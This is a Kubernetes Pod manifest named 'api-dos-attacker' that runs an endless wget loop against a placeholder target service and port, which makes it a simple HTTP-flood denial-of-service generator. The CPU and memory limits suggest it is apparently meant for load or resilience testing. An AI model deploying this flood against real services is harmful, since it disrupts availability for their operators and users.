apiVersion: v1
kind: Pod
metadata:
  name: api-dos-attacker
  labels:
    app: api-dos
spec:
  containers:
  - name: dos-attacker
    image: alpine:latest
    command: ["/bin/sh", "-c"]
    args:
      - while true; do wget -q -O- http://<TARGET-SERVICE>:<TARGET-PORT>; done
    resources:
      limits:
        cpu: "500m"
        memory: "256Mi"
  restartPolicy: Never
